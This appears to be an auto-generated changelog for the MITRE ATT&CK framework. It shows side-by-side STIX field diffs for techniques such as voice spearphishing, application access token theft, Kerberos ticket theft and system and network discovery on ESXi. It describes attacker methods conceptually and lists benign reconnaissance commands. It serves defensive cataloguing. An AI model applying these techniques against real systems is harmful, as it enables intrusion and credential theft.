All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)
Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing) | Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Tools](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)
Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing) |
| x_mitre_version | 1.1 | 1.2 |
[T1132.001] Data Encoding: Standard Encoding
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-03 00:31:33.071000+00:00 | 2025-04-16 20:37:14.817000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1037.005] Boot or Logon Initialization Scripts: Startup Items
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 16:43:21.560000+00:00 | 2025-04-16 20:37:20.168000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1528] Steal Application Access Token
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
|---|
| t | Adversaries can steal application access tokens as a means o | t | Adversaries can steal application access tokens as a means o |
| f acquiring credentials to access remote systems and resourc | | f acquiring credentials to access remote systems and resourc |
| es. Application access tokens are used to make authorized A | | es. Application access tokens are used to make authorized A |
| PI requests on behalf of a user or service and are commonly | | PI requests on behalf of a user or service and are commonly |
| used as a way to access resources in cloud and container-bas | | used as a way to access resources in cloud and container-bas |
| ed applications and software-as-a-service (SaaS).(Citation: | | ed applications and software-as-a-service (SaaS).(Citation: |
| Auth0 - Why You Should Always Use Access Tokens to Secure AP | | Auth0 - Why You Should Always Use Access Tokens to Secure AP |
| Is Sept 2019) Adversaries who steal account API tokens in c | | Is Sept 2019) Adversaries who steal account API tokens in c |
| loud and containerized environments may be able to access da | | loud and containerized environments may be able to access da |
| ta and perform actions with the permissions of these account | | ta and perform actions with the permissions of these account |
| s, which can lead to privilege escalation and further compro | | s, which can lead to privilege escalation and further compro |
| mise of the environment. For example, in Kubernetes environ | | mise of the environment. For example, in Kubernetes environ |
| ments, processes running inside a container may communicate | | ments, processes running inside a container may communicate |
| with the Kubernetes API server using service account tokens. | | with the Kubernetes API server using service account tokens. |
| If a container is compromised, an adversary may be able to | | If a container is compromised, an adversary may be able to |
| steal the container’s token and thereby gain access to Kuber | | steal the container’s token and thereby gain access to Kuber |
| netes API commands.(Citation: Kubernetes Service Accounts) | | netes API commands.(Citation: Kubernetes Service Accounts) |
| Similarly, instances within continuous-development / continu | | Similarly, instances within continuous-development / conti |
| ous-integration (CI/CD) pipelines will often use API tokens | | nuous-integration (CI/CD) pipelines will often use API token |
| to authenticate to other services for testing and deployment | | s to authenticate to other services for testing and deployme |
| .(Citation: Cider Security Top 10 CICD Security Risks) If th | | nt.(Citation: Cider Security Top 10 CICD Security Risks) If |
| ese pipelines are compromised, adversaries may be able to st | | these pipelines are compromised, adversaries may be able to |
| eal these tokens and leverage their privileges. Token theft | | steal these tokens and leverage their privileges. In Azure |
| can also occur through social engineering, in which case us | | , an adversary who compromises a resource with an attached M |
| er action may be required to grant access. OAuth is one comm | | anaged Identity, such as an Azure VM, can request short-live |
| only implemented framework that issues tokens to users for a | | d tokens through the Azure Instance Metadata Service (IMDS). |
| ccess to systems. An application desiring access to cloud-ba | | These tokens can then facilitate unauthorized actions or fu |
| sed services or protected APIs can gain entry using OAuth 2. | | rther access to other Azure services, bypassing typical cred |
| 0 through a variety of authorization protocols. An example c | | ential-based authentication.(Citation: Entra Managed Identit |
| ommonly-used sequence is Microsoft's Authorization Code Gran | | ies 2025)(Citation: SpecterOps Managed Identity 2022) Token |
| t flow.(Citation: Microsoft Identity Platform Protocols May | | theft can also occur through social engineering, in which c |
| 2019)(Citation: Microsoft - OAuth Code Authorization flow - | | ase user action may be required to grant access. OAuth is on |
| June 2019) An OAuth access token enables a third-party appli | | e commonly implemented framework that issues tokens to users |
| cation to interact with resources containing user data in th | | for access to systems. An application desiring access to cl |
| e ways requested by the application without obtaining user c | | oud-based services or protected APIs can gain entry using OA |
| redentials. Adversaries can leverage OAuth authorization | | uth 2.0 through a variety of authorization protocols. An exa |
| by constructing a malicious application designed to be grant | | mple commonly-used sequence is Microsoft's Authorization Cod |
| ed access to resources with the target user's OAuth token.(C | | e Grant flow.(Citation: Microsoft Identity Platform Protocol |
| itation: Amnesty OAuth Phishing Attacks, August 2019)(Citati | | s May 2019)(Citation: Microsoft - OAuth Code Authorization f |
| on: Trend Micro Pawn Storm OAuth 2017) The adversary will ne | | low - June 2019) An OAuth access token enables a third-party |
| ed to complete registration of their application with the au | | application to interact with resources containing user data |
| thorization server, for example Microsoft Identity Platform | | in the ways requested by the application without obtaining |
| using Azure Portal, the Visual Studio IDE, the command-line | | user credentials. Adversaries can leverage OAuth authoriz |
| interface, PowerShell, or REST API calls.(Citation: Microsof | | ation by constructing a malicious application designed to be |
| t - Azure AD App Registration - May 2019) Then, they can sen | | granted access to resources with the target user's OAuth to |
| d a [Spearphishing Link](https://attack.mitre.org/techniques | | ken.(Citation: Amnesty OAuth Phishing Attacks, August 2019)( |
| /T1566/002) to the target user to entice them to grant acces | | Citation: Trend Micro Pawn Storm OAuth 2017) The adversary w |
| s to the application. Once the OAuth access token is granted | | ill need to complete registration of their application with |
| , the application can gain potentially long-term access to f | | the authorization server, for example Microsoft Identity Pla |
| eatures of the user account through [Application Access Toke | | tform using Azure Portal, the Visual Studio IDE, the command |
| n](https://attack.mitre.org/techniques/T1550/001).(Citation: | | -line interface, PowerShell, or REST API calls.(Citation: Mi |
| Microsoft - Azure AD Identity Tokens - Aug 2019) Applicati | | crosoft - Azure AD App Registration - May 2019) Then, they c |
| on access tokens may function within a limited lifetime, lim | | an send a [Spearphishing Link](https://attack.mitre.org/tech |
| iting how long an adversary can utilize the stolen token. Ho | | niques/T1566/002) to the target user to entice them to grant |
| wever, in some cases, adversaries can also steal application | | access to the application. Once the OAuth access token is g |
| refresh tokens(Citation: Auth0 Understanding Refresh Tokens | | ranted, the application can gain potentially long-term acces |
| ), allowing them to obtain new access tokens without prompti | | s to features of the user account through [Application Acces |
| ng the user. | | s Token](https://attack.mitre.org/techniques/T1550/001).(Cit |
| | | ation: Microsoft - Azure AD Identity Tokens - Aug 2019) App |
| | | lication access tokens may function within a limited lifetim |
| | | e, limiting how long an adversary can utilize the stolen tok |
| | | en. However, in some cases, adversaries can also steal appli |
| | | cation refresh tokens(Citation: Auth0 Understanding Refresh |
| | | Tokens), allowing them to obtain new access tokens without p |
| | | rompting the user. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:49.300000+00:00 |
| description | Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.
Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.
| Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)
Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.
In Azure, an adversary who compromises a resource with an attached Managed Identity, such as an Azure VM, can request short-lived tokens through the Azure Instance Metadata Service (IMDS). These tokens can then facilitate unauthorized actions or further access to other Azure services, bypassing typical credential-based authentication.(Citation: Entra Managed Identities 2025)(Citation: SpecterOps Managed Identity 2022)
Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. |
| external_references[2]['description'] | Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021. | Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://auth0.com/learn/refresh-tokens/ | https://auth0.com/learn/refresh-tokens |
| external_references[4]['description'] | Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved March 24, 2024. | Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.cidersecurity.io/top-10-cicd-security-risks/ | https://web.archive.org/web/20220316130828/https://www.cidersecurity.io/top-10-cicd-security-risks/ |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'SpecterOps Managed Identity 2022', 'description': 'Andy Robbins. (2022, June 6). Managed Identity Attack Paths, Part 1: Automation Accounts. Retrieved March 18, 2025.', 'url': 'https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c'} |
| external_references | | {'source_name': 'Entra Managed Identities 2025', 'description': 'Microsoft Entra. (2025, February 27). How to use managed identities for Azure resources on an Azure VM to acquire an access token. Retrieved March 18, 2025.', 'url': 'https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token'} |
| x_mitre_contributors | | Eliraz Levi, Hunters Security |
| x_mitre_contributors | | Alon Klayman, Hunters Security |
[T1558] Steal or Forge Kerberos Tickets
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Kerberos authentication enabled'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-17 19:49:11.455000+00:00 | 2025-04-15 19:58:25.352000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
[T1001.002] Data Obfuscation: Steganography
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-15 00:37:58.963000+00:00 | 2025-04-15 19:59:20.025000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1027.008] Obfuscated Files or Information: Stripped Payloads
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:26:49.584000+00:00 | 2025-04-15 19:58:18.337000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1553] Subvert Trust Controls
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Autoruns Analysis', 'Digital Certificate Validation', 'User Mode Signature Validation', 'Windows User Account Control', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-01 17:17:37.292000+00:00 | 2025-04-15 19:59:00.906000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1548.003] Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['root'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-14 16:28:19.781000+00:00 | 2025-04-15 19:58:08.135000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1573.001] Encrypted Channel: Symmetric Cryptography
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-12-26 20:58:19.356000+00:00 | 2025-04-15 19:58:14.636000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1218] System Binary Proxy Execution
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control', 'Digital Certificate Validation'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-01 16:25:43.150000+00:00 | 2025-04-15 19:58:27.332000+00:00 |
| x_mitre_version | 3.1 | 3.2 |
[T1497.001] Virtualization/Sandbox Evasion: System Checks
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Static File Analysis', 'Signature-based detection', 'Host forensic analysis', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:50:18.047000+00:00 | 2025-04-15 19:58:16.253000+00:00 |
| x_mitre_version | 2.2 | 2.3 |
[T1542.001] Pre-OS Boot: System Firmware
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host intrusion prevention systems', 'Anti-virus', 'File monitoring'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:21:51.311000+00:00 | 2025-04-15 19:58:09.046000+00:00 |
| external_references[3]['description'] | Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017. | Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024. |
| external_references[3]['url'] | http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html | https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[1] | Network | Network Devices |
[T1082] System Information Discovery
Current version: 2.6
Version changed from: 2.5 → 2.6
|
|
|---|
| t | An adversary may attempt to get detailed information about t | t | An adversary may attempt to get detailed information about t |
| he operating system and hardware, including version, patches | | he operating system and hardware, including version, patches |
| , hotfixes, service packs, and architecture. Adversaries may | | , hotfixes, service packs, and architecture. Adversaries may |
| use the information from [System Information Discovery](htt | | use the information from [System Information Discovery](htt |
| ps://attack.mitre.org/techniques/T1082) during automated dis | | ps://attack.mitre.org/techniques/T1082) during automated dis |
| covery to shape follow-on behaviors, including whether or no | | covery to shape follow-on behaviors, including whether or no |
| t the adversary fully infects the target and/or attempts spe | | t the adversary fully infects the target and/or attempts spe |
| cific actions. Tools such as [Systeminfo](https://attack.mi | | cific actions. Tools such as [Systeminfo](https://attack.mi |
| tre.org/software/S0096) can be used to gather detailed syste | | tre.org/software/S0096) can be used to gather detailed syste |
| m information. If running with privileged access, a breakdow | | m information. If running with privileged access, a breakdow |
| n of system data can be gathered through the <code>systemset | | n of system data can be gathered through the <code>systemset |
| up</code> configuration tool on macOS. As an example, advers | | up</code> configuration tool on macOS. As an example, advers |
| aries with user-level access can execute the <code>df -aH</c | | aries with user-level access can execute the <code>df -aH</c |
| ode> command to obtain currently mounted disks and associate | | ode> command to obtain currently mounted disks and associate |
| d freely available space. Adversaries may also leverage a [N | | d freely available space. Adversaries may also leverage a [N |
| etwork Device CLI](https://attack.mitre.org/techniques/T1059 | | etwork Device CLI](https://attack.mitre.org/techniques/T1059 |
| /008) on network devices to gather detailed system informati | | /008) on network devices to gather detailed system informati |
| on (e.g. <code>show version</code>).(Citation: US-CERT-TA18- | | on (e.g. <code>show version</code>).(Citation: US-CERT-TA18- |
| 106A) [System Information Discovery](https://attack.mitre.or | | 106A) On ESXi servers, threat actors may gather system infor |
| g/techniques/T1082) combined with information gathered from | | mation from various esxcli utilities, such as `system hostna |
| other forms of discovery and reconnaissance can drive payloa | | me get`, `system version get`, and `storage filesystem list` |
| d development and concealment.(Citation: OSX.FairyTale)(Cita | | (to list storage volumes).(Citation: Crowdstrike Hypervisor |
| tion: 20 macOS Common Tools and Techniques) Infrastructure | | Jackpotting Pt 2 2021)(Citation: Varonis) Infrastructure a |
| as a Service (IaaS) cloud providers such as AWS, GCP, and Az | | s a Service (IaaS) cloud providers such as AWS, GCP, and Azu |
| ure allow access to instance and virtual machine information | | re allow access to instance and virtual machine information |
| via APIs. Successful authenticated API calls can return dat | | via APIs. Successful authenticated API calls can return data |
| a such as the operating system platform and status of a part | | such as the operating system platform and status of a parti |
| icular instance or the model view of a virtual machine.(Cita | | cular instance or the model view of a virtual machine.(Citat |
| tion: Amazon Describe Instance)(Citation: Google Instances R | | ion: Amazon Describe Instance)(Citation: Google Instances Re |
| esource)(Citation: Microsoft Virutal Machine API) | | source)(Citation: Microsoft Virutal Machine API) [System In |
| | | formation Discovery](https://attack.mitre.org/techniques/T10 |
| | | 82) combined with information gathered from other forms of d |
| | | iscovery and reconnaissance can drive payload development an |
| | | d concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS C |
| | | ommon Tools and Techniques) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:42:22.247000+00:00 | 2025-04-15 19:58:21.308000+00:00 |
| description | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get`, `system version get`, and `storage filesystem list` (to list storage volumes).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) |
| x_mitre_version | 2.5 | 2.6 |
| x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Varonis', 'description': 'Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.', 'url': 'https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire'} |
| external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
| x_mitre_platforms | | ESXi |
[T1614.001] System Location Discovery: System Language Discovery
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 22:00:56.174000+00:00 | 2025-04-15 19:59:04.692000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1016] System Network Configuration Discovery
Current version: 1.7
Version changed from: 1.6 → 1.7
|
|
|---|
| t | Adversaries may look for details about the network configura | t | Adversaries may look for details about the network configura |
| tion and settings, such as IP and/or MAC addresses, of syste | | tion and settings, such as IP and/or MAC addresses, of syste |
| ms they access or through information discovery of remote sy | | ms they access or through information discovery of remote sy |
| stems. Several operating system administration utilities exi | | stems. Several operating system administration utilities exi |
| st that can be used to gather this information. Examples inc | | st that can be used to gather this information. Examples inc |
| lude [Arp](https://attack.mitre.org/software/S0099), [ipconf | | lude [Arp](https://attack.mitre.org/software/S0099), [ipconf |
| ig](https://attack.mitre.org/software/S0100)/[ifconfig](http | | ig](https://attack.mitre.org/software/S0100)/[ifconfig](http |
| s://attack.mitre.org/software/S0101), [nbtstat](https://atta | | s://attack.mitre.org/software/S0101), [nbtstat](https://atta |
| ck.mitre.org/software/S0102), and [route](https://attack.mit | | ck.mitre.org/software/S0102), and [route](https://attack.mit |
| re.org/software/S0103). Adversaries may also leverage a [Ne | | re.org/software/S0103). Adversaries may also leverage a [Ne |
| twork Device CLI](https://attack.mitre.org/techniques/T1059/ | | twork Device CLI](https://attack.mitre.org/techniques/T1059/ |
| 008) on network devices to gather information about configur | | 008) on network devices to gather information about configur |
| ations and settings, such as IP addresses of configured inte | | ations and settings, such as IP addresses of configured inte |
| rfaces and static/dynamic routes (e.g. <code>show ip route</ | | rfaces and static/dynamic routes (e.g. <code>show ip route</ |
| code>, <code>show ip interface</code>).(Citation: US-CERT-TA | | code>, <code>show ip interface</code>).(Citation: US-CERT-TA |
| 18-106A)(Citation: Mandiant APT41 Global Intrusion ) Advers | | 18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi |
| aries may use the information from [System Network Configura | | , adversaries may leverage esxcli to gather network configur |
| tion Discovery](https://attack.mitre.org/techniques/T1016) d | | ation information. For example, the command `esxcli network |
| uring automated discovery to shape follow-on behaviors, incl | | nic list` will retrieve the MAC address, while `esxcli netwo |
| uding determining certain access within the target network a | | rk ip interface ipv4 get` will retrieve the local IPv4 addre |
| nd what actions to do next. | | ss.(Citation: Trellix Rnasomhouse 2024) Adversaries may use |
| | | the information from [System Network Configuration Discover |
| | | y](https://attack.mitre.org/techniques/T1016) during automat |
| | | ed discovery to shape follow-on behaviors, including determi |
| | | ning certain access within the target network and what actio |
| | | ns to do next. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-28 14:40:54.580000+00:00 | 2025-04-15 19:58:40.773000+00:00 |
| description | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
